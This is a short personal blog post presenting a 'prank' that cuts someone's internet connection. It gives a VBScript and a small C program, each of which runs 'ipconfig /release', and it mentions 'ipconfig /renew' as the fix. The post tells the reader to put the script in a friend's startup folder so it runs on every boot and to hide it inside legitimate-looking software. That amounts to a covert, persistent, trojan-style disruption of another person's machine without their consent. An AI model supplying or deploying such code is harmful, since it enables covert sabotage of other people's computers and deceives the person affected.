Followers

Search This Blog

About Me

My photo
I like to exercise my knowedge of computers at extreme

Blog Archive

Popular Posts

2012/03/05

disable internet forever

Here is a small prank
disable internet forever
 
A script to disable your internet,So here we use a simple command to fuzz around your not so geeky friend
Once you run this script, it just removes the ip address by help of “ipconfig /release”
And hence the internet connection is rendered useless .
To re-enable his connection type the following in his command prompt
“ipconfig /renew”

Set WSHShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "C:\WINDOWS\system32\ipconfig /release"

You can save the script and put it in his startup folder to worsen his situation
And to make it worst hide it behind any some other legimate interesting software

Exe version::
#include <stdlib.h>
#include<windows.h>

int main()
{
system("ipconfig /release");
return 0;
}


He can never connect to internet if he has no idea of ipconfig.
Note: Use it for legitimate purposes!!!




No comments:

Post a Comment